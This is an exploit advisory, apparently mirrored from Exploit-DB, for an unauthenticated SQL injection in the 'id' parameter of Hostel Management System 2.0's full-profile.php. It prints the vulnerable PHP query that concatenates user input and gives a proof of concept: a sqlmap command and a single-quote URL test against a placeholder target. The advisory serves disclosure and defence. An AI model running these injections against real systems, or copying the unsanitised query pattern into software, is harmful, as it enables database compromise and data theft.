Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)

vendor:

Hostel Management System

by:

Selim Enes 'Enesdex' Karaduman

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Hostel Management System

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgurukul:hostel_management_system:2.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 - Wamp Server

2020

Hostel Management System 2.0 – ‘id’ SQL Injection (Unauthenticated)

The 'id' parameter's value is going into the SQL query directly, allowing an attacker to inject malicious SQL code. Proof of concept can be done using sqlmap or by adding a single quote to the URL.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
# Date: 2020-06-02
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
# Version: 2.0
# Tested on: Windows 10 - Wamp Server

--Vulnerable file /full-profile.php

--Vulnerable code;
    $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");

    Id parameter's value is going into sql query directly!

--Proof Of Concept 
   
   sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" 
   OR
   http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error